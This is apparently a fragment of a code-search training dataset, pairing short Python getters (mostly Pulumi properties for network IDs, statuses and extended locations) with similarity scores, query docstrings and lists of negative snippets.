"def datacenter_uuid(self) -> str:\n return self.__datacenter_uuid",
"def get_cluster_id(self, item: str) -> str:\n assert item in self._clusters.keys()\n return self._clusters[item]",
"def core_network_arn(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"core_network_arn\")",
"def get_network_id(options, network):\n service_instance = get_vc_content(options)\n datacenter = get_datacenter(options)\n for item in datacenter.networkFolder.childEntity:\n if (item.name == network):\n return item._GetMoId()",
"def l3_network_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"l3_network_name\")",
"def resource_group_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def establish_id(self):\n if self.config.node_id is None:\n self.config.node_id = str(uuid4()).replace('-', '')\n return self.config.node_id",
"def network_id(tenant_id, auth_token, network_name):\r\n content = common_utils.do_request(\r\n tenant_id, auth_token,\r\n method='GET',\r\n body='', service=\"network\",\r\n path='networks.json')\r\n for network in range(len(content[\"networks\"])):\r\n if content[\"networks\"][network][\"name\"] == network_name:\r\n network_id = content[\"networks\"][network][\"id\"]\r\n return network_id",
"def __repr__(self):\n\n return \"<Cluster id=%s>\" % (self.id)",
"def get_cluster_idx(_cluster):\n\n return _cluster.cluster_idx",
"def virtual_network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_id\")",
"def cluster_constraint(self):\n return self._cluster_constraint",
"def get_cluster(self,cluster_name,project_id=''):\n print( f'>>>>>>{self.project_id}')\n if project_id == '':\n project_id = self.project_id\n return self.get('{}/groups/{}/clusters/{}'.format(ApiVersion.A1.value,project_id,cluster_name))",
"def subnet_id(self) -> str:\n return pulumi.get(self, \"subnet_id\")",
"def getMcc3Id(self):\n return self._base.getMcc3Id()",
"def node_id(self) -> int:\n return self.data[\"nodeId\"]",
"def node_id(self) -> int:\n return self.data[\"nodeId\"]",
"def resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"resource_id\")",
"def getMcc3Id(self):\n return self.mcc3id",
"def getMcc3Id(self):\n return self.mcc3id",
"def getMcc3Id(self):\n return self.mcc3id",
"def getMcc3Id(self):\n return self.mcc3id",
"def id(self) -> str:\n\n return self._inst.query('*IDN?')",
"def reactornet_id(self):\n return self.__reactornet_id",
"def __str__(self):\n return \"Cluster\"",
"def remote_virtual_network_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"remote_virtual_network_id\")",
"def resource_group_id(self) -> Optional[str]:\n return pulumi.get(self, \"resource_group_id\")"
] | [
"0.8012701",
"0.8012701",
"0.8012701",
"0.8012701",
"0.8012701",
"0.767193",
"0.724202",
"0.724202",
"0.71904457",
"0.71904457",
"0.71904457",
"0.7147318",
"0.71079326",
"0.7104546",
"0.70985615",
"0.70811",
"0.7055768",
"0.69946766",
"0.69447",
"0.69314307",
"0.68725604",
"0.6832653",
"0.6832653",
"0.6832653",
"0.67877",
"0.675452",
"0.675452",
"0.67255384",
"0.6703281",
"0.66540194",
"0.66500056",
"0.6586709",
"0.6579923",
"0.65753603",
"0.6549429",
"0.6549429",
"0.6436575",
"0.6436575",
"0.6436575",
"0.64012647",
"0.63643515",
"0.63575846",
"0.63575846",
"0.63575846",
"0.63575846",
"0.63575846",
"0.6321969",
"0.62877643",
"0.62430173",
"0.624208",
"0.62416667",
"0.6241128",
"0.6241128",
"0.6211911",
"0.6211911",
"0.6196339",
"0.6190815",
"0.6190815",
"0.6190815",
"0.6173408",
"0.61450046",
"0.61427855",
"0.61427855",
"0.61427855",
"0.61427855",
"0.61427855",
"0.61383533",
"0.6137229",
"0.6092062",
"0.6092062",
"0.6092062",
"0.60756564",
"0.60585934",
"0.60494816",
"0.60337055",
"0.598342",
"0.59791404",
"0.59762883",
"0.5958334",
"0.59526455",
"0.59298325",
"0.5926837",
"0.59239966",
"0.59227157",
"0.5920609",
"0.5917674",
"0.5917674",
"0.5917547",
"0.59090245",
"0.59090245",
"0.59090245",
"0.59090245",
"0.5904049",
"0.58937186",
"0.5869006",
"0.5868684",
"0.5867358"
] | 0.74517417 | 8 |
The more detailed status of the L3 network. | def detailed_status(self) -> pulumi.Output[str]:
return pulumi.get(self, "detailed_status") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def status(ctx):\n return show_network_status()",
"def detailed_status(self) -> str:\n return pulumi.get(self, \"detailed_status\")",
"def status(self):\n \n tmpl1 = \"\"\"%-20s%-52s[%s]\"\"\"\n tmpl2 = \"\"\"%-20s%-52s\\n\"\"\"\n # print tmpl1 % (\"Machine Name\", \"IP Addresses\", \"Status\")\n # print 80 * \"-\"\n # print self.get_image()\n if self.cloudserver:\n # let's build the IPs first\n status = self.cloudserver.status\n \n else:\n status = \"OFF\"\n\n res2=\"\"\n ip1 = \"%s:%s\" % (self.networks[0], self.ip_addresses[self.networks[0]])\n if len(self.networks) > 1:\n res2 += \"\\n\"\n for network in self.networks[1:]:\n ipstr = \"%s:%s\" % (network, self.ip_addresses[network])\n res2+=tmpl2 % (\"-\", ipstr)\n # print res2\n # if len(self.ip_addresses.keys()) > 1:\n # ip1 = self.ip_addresses.values()[0]\n res1 = tmpl1 % (self.machine_name, ip1, status)\n return res1 + res2",
"def status(self):\n res = \"\"\n for tlight in self.trafficLights:\n res += \"Traffic light {} status: {}\\n\".format(self.trafficLights[tlight].id,self.trafficLights[tlight].getState())\n return res",
"def status(self):\n return {\n 'id': 'status',\n 'protocol_version': 'PV62',\n 'network': self.origin_node.network.name,\n 'td': self.origin_node.chain.head.header.difficulty,\n 'best_hash': self.origin_node.chain.head.header.hash,\n 'genesis_hash': self.origin_node.chain.genesis.header.hash,\n 'size': kB_to_MB(self._message_size['status'])\n }",
"def get_status(self):\n if self.status:\n print(f\"Server '{self.server_name}' is online\")\n else:\n print(f\"Server '{self.server_name}' is offline\")",
"def printstatus(self):\n data = self.statuslist()\n if not data:\n print(\n \"Unable to communicate to the OpenSprinkler \"\n \"at %s\" % self.hostname\n )\n return None\n print('Station\\t%-15.15s\\tStatus' % 'Name')\n for item in data:\n print('%d\\t%-15.15s\\t%s' % (item[0], item[1], item[2]))\n return",
"def status(self):\n r = requests.get('/'.join([self.base_url, self.ENDPOINT_STATUS]))\n return r.json()",
"def status(self, *args):\n st = dict()\n st[\"num_sockets\"] = 0 # TODO: when sockets implemented\n st[\"mem_free\"] = gc.mem_free()\n st[\"wlan_connected\"] = network.WLAN(network.STA_IF).isconnected()\n return True, json.dumps(st).encode()",
"def get_status(self):\n r = requests.get(self.base_url + '/status')\n return r.json()",
"def detail(self):\n return self.status[\"health\"][\"detail\"]",
"def getStatus():",
"def remote_status():",
"def status(self):\n return self._get(path='status')",
"def status_str(self, spaced=False):\n if self.args.vverbose:\n ## Print profile of all nodes\n status = self.pool.status(string=True)\n\n elif self.args.verbose:\n ## Print profile of usable nodes\n status = self.pool.status(min_state=PLNodeState.usable, string=True)\n\n else:\n ## Print list of usable nodes\n attribute = \"name\" if self.args.names else \"addr\"\n nodes = self.pool._get(attribute, min_state=PLNodeState.usable)\n if len(nodes) > 0:\n status = \"\\n\".join(nodes)+\"\\n\"\n else:\n status = \"No usable node found.\\n\"\n\n return status",
"def status(self):",
"def detailed_status_message(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"detailed_status_message\")",
"def detailed_status_message(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"detailed_status_message\")",
"def print_status(self):\n wlan = ''\n ip = ''\n mac = ''\n homepage = ''\n pairing_code = ''\n\n ssid = helpers.get_ssid()\n wlan = '\\nWireless network:\\n%s\\n\\n' % ssid\n\n interfaces = ni.interfaces()\n ips = []\n for iface_id in interfaces:\n iface_obj = ni.ifaddresses(iface_id)\n ifconfigs = iface_obj.get(ni.AF_INET, [])\n for conf in ifconfigs:\n if conf.get('addr') and conf.get('addr'):\n ips.append(conf.get('addr'))\n if len(ips) == 0:\n ip = '\\nERROR: Could not connect to LAN\\n\\nPlease check that the IoTBox is correc-\\ntly connected with a network cable,\\n that the LAN is setup with DHCP, and\\nthat network addresses are available'\n elif len(ips) == 1:\n ip = '\\nIP Address:\\n%s\\n' % ips[0]\n else:\n ip = '\\nIP Addresses:\\n%s\\n' % '\\n'.join(ips)\n\n if len(ips) >= 1:\n ips_filtered = [i for i in ips if i != '127.0.0.1']\n main_ips = ips_filtered and ips_filtered[0] or '127.0.0.1'\n mac = '\\nMAC Address:\\n%s\\n' % helpers.get_mac_address()\n homepage = '\\nHomepage:\\nhttp://%s:8069\\n\\n' % main_ips\n\n code = connection_manager.pairing_code\n if code:\n pairing_code = '\\nPairing Code:\\n%s\\n' % code\n\n commands = RECEIPT_PRINTER_COMMANDS[self.receipt_protocol]\n title = commands['title'] % b'IoTBox Status'\n self.print_raw(commands['center'] + title + b'\\n' + wlan.encode() + mac.encode() + ip.encode() + homepage.encode() + pairing_code.encode() + commands['cut'])",
"def status_detail(self):\n return self._status_detail",
"def status(self):\n pass",
"def status(self):\n pass",
"def detailed_status_message(self) -> str:\n return pulumi.get(self, \"detailed_status_message\")",
"def status(self, station=1):\n return self.statuslist()[station][2]",
"def getClusterStatus(self):\n data = self.connect('get','cluster/status', None)\n return data",
"def getInfoOnStatus(self):\n raise NotImplementedError();",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def showStat(self):\n print \">>[Stat Information]:\"\n if self.gid != DEFALUT_GROUP_ID:\n print \"Gid = %u\" % self.gid\n print \"[Queries] Arp = %u, Original_to_controller= %u, Current_to_controller = %u\" % (self.query_arp, self.query_control_origin, self.query_control_current)\n print \"TP = %u, TN = %u, FP = %u\" % (self.tp, self.tn, self.fp)\n print \"[Flow] local_switch = %u, within the group = %u,across groups = %u\" % (self.flow_local, self.flow_within_group, self.flow_cross_group)\n print \"[Traffic] local_switch = %u byte, within the group = %u byte,across groups = %u byte\" % (self.byte_local, self.byte_within_group, self.byte_cross_group)",
"def status(self):\n return self.microblaze.state",
"def status(self):\n return self._data['status']",
"def status(self):\n return self._query_status()['status']",
"def display_status(self) -> str:\n return pulumi.get(self, \"display_status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self):\n logging.debug(\"%s entered status\" % self)\n # print_config(self.infra)\n # print self.images\n # headers = [\"Machine Name\", \"Flavor\", \"IP Addresses\", \"Image Name\", \"Status\"]\n # pt = prettytable.PrettyTable(headers)\n # pt.align[\"Machine Name\"]=\"l\"\n # pt.align[\"IP Addresses\"] = \"l\"\n # pt.align[\"Image Name\"] = \"l\"\n # pt.align[\"Status\"] = \"r\"\n \n print \"Checking status of %s\" % self.footprint_name\n # tmpl = \"%(machine_name)-20s%(flavor)5s%(status)-30s\"\n tmpl1 = \"\"\"%-20s%-52s[%s]\"\"\"\n tmpl2 = \"\"\"%-20s%-60s\\n\"\"\"\n print tmpl1 % (\"Machine Name\", \"IP Addresses\", \"Status\")\n print 80 * \"-\"\n \n for machine in self.machines.keys():\n m = self.machines[machine]\n # machine_name = m.machine_name\n # ips = str(m.ip_addresses)\n # flavor = str(m.flavor)\n # img = str(m.image_id)\n # status = str(m.status)\n # pt.add_row([m, ips, status, img, status])\n # print \"FFF\", m, ips, flavor, img, status\n # print tmpl % locals()\n print m.status\n \n return \"%s is currently: %s\" % (self.footprint_name, self.footprint_status)",
"def print_summary(self):\n self.network.print_summary()",
"def show_status():\n\n pass",
"def print_network(self):\n #plot_model(self.model, to_file='model.png', show_shapes=True)\n logging.info(\"\")\n logging.info(self.network)\n logging.info(\"Network accuracy: %.2f%%\" % (self.accuracy * 100))\n logging.info(\"Network loss: %.2f%%\" % (self.loss))",
"def status(self):\n\t\treturn self._status",
"def _print_status(self):",
"def status(self):\n return self.status",
"def status_info(self):\n def subdevice_filter(info):\n return bool(info['kind'] & Kind.normal)\n\n return ophydobj_info(self, subdevice_filter=subdevice_filter)",
"def status(self):\n self._refresh_state()\n return self._data.get('status')",
"def Status(self):\r\n\t\treturn self._get_attribute('status')",
"def sipserver_status(self) -> str:",
"def status(self):\n return dict(price_data=self.price_data,\n profit_data=self.profit_data,\n next_network=self.next_network,\n current_network=self.current_network)",
"def GetStatus(self):\r\n return self.status",
"def peer_status(self):\n cmdlist = shlex.split(\"gluster peer status\")\n output = subprocess.Popen(cmdlist, stdout=subprocess.PIPE)\n stdout = output.stdout.read()\n print json.dumps({\n \"output\": stdout\n })",
"def model_status():\n return juju.CLIENT.Client(request=\"FullStatus\")",
"def fetch_status():\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((GEARMAND_HOST, GEARMAND_PORT))\n log_verbose('Connected to Gearmand at %s:%s' % (GEARMAND_HOST, GEARMAND_PORT))\n except socket.error, e:\n collectd.error('gearmand_info plugin: Error connecting to %s:%d - %r'\n % (GEARMAND_HOST, GEARMAND_PORT, e))\n return None\n fp = s.makefile('r')\n log_verbose('Sending info command')\n s.sendall('status\\r\\n')\n\n status = {}\n while True:\n data = fp.readline().strip()\n log_verbose('Received data: %r' % data)\n if not data or data == '.':\n break\n function, total, running, available_workers = data.split('\\t')\n status[function] = {\n 'total': total,\n 'running': running,\n 'available_workers': available_workers}\n\n s.close()\n return status",
"def display_status(self):\n connected = _check_connection()\n status = (\n f'WiFi: {\"connected\" if connected else \"disconnected\"}\\n'\n f'MQTT host: {self.mqtt.host if self.mqtt else \"N/A\"}\\n'\n f'Packets sent: {self.mqtt.n_sent if self.mqtt else 0}\\n'\n f'Uptime: {self.uptime()}'\n )\n self.display.draw_text_box(status, bg_color=BG_CYAN if connected else BG_RED)",
"def status(self) -> 'outputs.ConnectionStatusResponse':\n return pulumi.get(self, \"status\")",
"def status(self):\n return self._call_txtrader_api('status', {})",
"def state(self):\n return self.device.status(station=self.station_number)",
"def getStatus(self):\r\n return self.controller.getStatus()",
"def status(self):\n return self.log.status",
"def status(self):\n return self.state",
"def status(self):\n return self.m.status"
] | [
"0.7574918",
"0.7074409",
"0.70706975",
"0.6863271",
"0.6652941",
"0.6643125",
"0.6537197",
"0.6532778",
"0.6486455",
"0.64751476",
"0.6474038",
"0.6464015",
"0.6456763",
"0.64546263",
"0.6443891",
"0.64406186",
"0.6434034",
"0.6434034",
"0.6425376",
"0.64220667",
"0.63576347",
"0.63576347",
"0.6343767",
"0.6305158",
"0.62883943",
"0.62774414",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.62488097",
"0.6239048",
"0.6235981",
"0.6231515",
"0.6227282",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6214133",
"0.6203906",
"0.6201898",
"0.6199496",
"0.6183484",
"0.6164759",
"0.61566633",
"0.61487436",
"0.6143894",
"0.6138211",
"0.6136251",
"0.61275274",
"0.61184925",
"0.6109839",
"0.6105358",
"0.6084382",
"0.60680014",
"0.60563886",
"0.60375994",
"0.6035632",
"0.60331523",
"0.60323435",
"0.6030377",
"0.60302514"
] | 0.71242344 | 2 |
The descriptive message about the current detailed status. | def detailed_status_message(self) -> pulumi.Output[str]:
return pulumi.get(self, "detailed_status_message") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def detailed_status_message(self) -> str:\n return pulumi.get(self, \"detailed_status_message\")",
"def detailed_status(self) -> str:\n return pulumi.get(self, \"detailed_status\")",
"def status_message(self) -> str:\n return pulumi.get(self, \"status_message\")",
"def detailed_status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"detailed_status\")",
"def detailed_status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"detailed_status\")",
"def status_message(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status_message\")",
"def status_detail(self):\n return self._status_detail",
"def _get_status(self):\n held_msg=\"\"\n return u'%s%s' % (self.get_status_display(), held_msg)",
"def status_message(self) -> Optional[str]:\n return pulumi.get(self, \"status_message\")",
"def get_status(self):\n return self.msg",
"def __str__(self):\n # return status text.\n return self.status_text",
"def __str__(self):\n return self.status_text",
"def __str__(self):\n return self.status_text",
"def __str__(self):\n return self.status_text",
"def report_state(self):\n text = \"Status: %d\"%self.state.num;\n if self.state.msg !=\"\":\n text += \", Msg: %s\"%self.state.msg;\n return text;",
"def display_status(self) -> str:\n return pulumi.get(self, \"display_status\")",
"def _get_status(self):\n return u'%s' % (self.get_status_display())",
"def detail(self):\n return self.status[\"health\"][\"detail\"]",
"def __str__(self):\n\n return self.status_text",
"def status_msg(self, context):\n msg = self._get_base_message(self.GET_STATUS)\n self._add_thread(msg)\n self._add_relationship(msg, self.for_relationship)\n return msg",
"def _print_status(self):",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status_reason(self):\n return self.status.split()[2]",
"def summary(self):\n res = \", \".join(\n elem[\"summary\"] for elem in self.status[\"health\"][\"summary\"]\n )\n if res:\n return res\n elif self.detail:\n return self.detail[0]\n return \"\"",
"def status_msg(self, msg):\n\n\t\tprint(\"function not supported yet\")",
"def format_status_info(self, status_info):\n lines = self._status_info_lines(status_info)\n if lines:\n return '\\n'.join(lines)\n else:\n return f'{self.name}: No status available'",
"def standard_status():\n errors, warnings, infos = THE_LOGGER.status()\n info(errors, \"errors\")\n info(warnings, \"warnings\")\n info(infos, \"infos\")",
"def provisioning_status_message(self) -> str:\n return pulumi.get(self, \"provisioning_status_message\")",
"def provisioning_status_message(self) -> str:\n return pulumi.get(self, \"provisioning_status_message\")",
"def provisioning_status_message(self) -> str:\n return pulumi.get(self, \"provisioning_status_message\")",
"def provisioning_status_message(self) -> str:\n return pulumi.get(self, \"provisioning_status_message\")",
"def status(self):\n return ''",
"def status(self) -> str:\n return self._status",
"def status(self) -> str:\n return self._status",
"def status(self) -> str:\n return self._status",
"def status(self) -> str:\n return self._status",
"def status(self) -> str:\n return self._status",
"def status(self) -> str:\n return self._status",
"def summary(self):\r\n return '%s%s: %s%s %s%s' % (BLUE, self.title,\r\n GREEN, self.description,\r\n NORMAL, self.link)",
"def status(self):\n if self.error_code:\n msg = self.error_code\n else:\n msg = 'C{cycle},P{seen},{progress:.0f}%'.format(\n cycle=self.cycle,\n seen=self.seen_per_cycle,\n progress=(self.step / float(self.count_points) * 100)\n )\n return '[W{worker_no}: {msg}]'.format(\n worker_no=self.worker_no,\n msg=msg\n )",
"def __status(self, *args):\n return \"status\"",
"def get_status_string(self, instance):\n return instance.get_status_string()",
"def report_info(self):\n report_values = ['test_description', 'expected_status']\n msg_data = ['']\n for report_value in report_values:\n msg_data.append(\"%s: %s\" %(report_value, getattr(self,report_value)))\n msg_data.append('')\n return '\\n'.join(msg_data)",
"def status(self):\n if self.to_phone:\n phone = '(%s) %s - %s' % (self.to_phone[:3], self.to_phone[3:6], self.to_phone[6:])\n else:\n phone = ''\n\n name = self.to_name if self.to_name else ''\n\n return ' poll in %ds | %s | %s ' % (self.step, name, phone)",
"def __str__(self):\n\n return self.status_text",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def display_status(self):\n time = float2str(self.scheduler.time, '10.2f')\n tx = float2str(self.tx_total, '10g')\n rx = float2str(self.rx_total, '10g')\n dup = float2str(self.dup_total, '10g')\n uniq_total = float2str(self.uniq_total, '10g')\n delivered_total = float2str(self.delivered_total, '10g')\n uniq_delivered_total = float2str(self.uniq_delivered_total, '10g')\n print(\n 'define status_l text Time:{},____TX:{},____RX:{},____DUP:{},____Delivered:{}__/__{},____Arrived:{} 14 white 0.5 0.05'\n .format(time, tx, rx, dup, uniq_delivered_total, uniq_total,\n delivered_total))",
"def index_status_description(self):\n if (self.index_status == 3):\n return 'approved'\n if (self.index_status == 0):\n return 'no data'\n if (self.index_status == 1):\n return 'reserved'\n if (self.index_status == 2):\n return 'pending'",
"def get_status(self):\n if self.cancelled:\n return \"Cancelled\"\n elif self.is_active():\n s = \"Active\"\n if self.is_paid():\n return \"{0} - Paid\".format(s)\n else:\n return \"{0} - Unpaid\".format(s)\n elif self.is_complete():\n s = \"Complete\"\n if self.is_paid():\n return \"{0} - Paid\".format(s)\n else:\n return \"{0} - Unpaid\".format(s)\n elif self.is_confirmed():\n s = \"Confirmed\"\n if self.is_paid():\n return \"{0} - Paid\".format(s)\n else:\n return \"{0} - Unpaid\".format(s)\n else:\n return \"Unknown - contact staff\"",
"def __str__(self):\n error_message = \"({0})\\n\"\\\n \"Reason: {1}\\n\".format(self.status, self.reason)\n if self.headers:\n error_message += \"HTTP response headers: {0}\\n\".format(self.headers)\n\n if self.body:\n error_message += \"HTTP response body: {0}\\n\".format(self.body)\n\n return error_message",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")"
] | [
"0.89667886",
"0.8075508",
"0.79899865",
"0.78511816",
"0.78511816",
"0.7514408",
"0.7487773",
"0.74315125",
"0.74046624",
"0.71724355",
"0.7140361",
"0.71236587",
"0.71236587",
"0.71236587",
"0.7112143",
"0.710846",
"0.710131",
"0.70546633",
"0.6989946",
"0.69429255",
"0.6897839",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6871012",
"0.6836113",
"0.6813361",
"0.67387164",
"0.67261624",
"0.67177427",
"0.67177427",
"0.67177427",
"0.67177427",
"0.6692822",
"0.6686273",
"0.6686273",
"0.6686273",
"0.6686273",
"0.6686273",
"0.6686273",
"0.6681855",
"0.66778505",
"0.6665873",
"0.6631201",
"0.6628522",
"0.6623891",
"0.6614947",
"0.6609931",
"0.6609931",
"0.6609931",
"0.6609931",
"0.6609931",
"0.6609931",
"0.6609931",
"0.6609931",
"0.6609931",
"0.6599627",
"0.65775716",
"0.6574345",
"0.6548519",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594"
] | 0.87084526 | 2 |
The extended location of the cluster associated with the resource. | def extended_location(self) -> pulumi.Output['outputs.ExtendedLocationResponse']:
return pulumi.get(self, "extended_location") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def extended_location(self) -> pulumi.Output[Optional['outputs.ExtendedLocationResponse']]:\n return pulumi.get(self, \"extended_location\")",
"def extended_location(self) -> pulumi.Input['ExtendedLocationArgs']:\n return pulumi.get(self, \"extended_location\")",
"def extended_location(self) -> pulumi.Input['ExtendedLocationArgs']:\n return pulumi.get(self, \"extended_location\")",
"def set_up_extended_location(self, mc: ManagedCluster) -> ManagedCluster:\n self._ensure_mc(mc)\n\n edge_zone = self.context.get_edge_zone()\n if edge_zone:\n mc.extended_location = self.models.ExtendedLocation(\n name=edge_zone,\n type=self.models.ExtendedLocationTypes.EDGE_ZONE\n )\n return mc",
"def extended_location(self) -> Optional[pulumi.Input['ExtendedLocationArgs']]:\n return pulumi.get(self, \"extended_location\")",
"def extended_location(self) -> Optional['outputs.ExtendedLocationResponse']:\n return pulumi.get(self, \"extended_location\")",
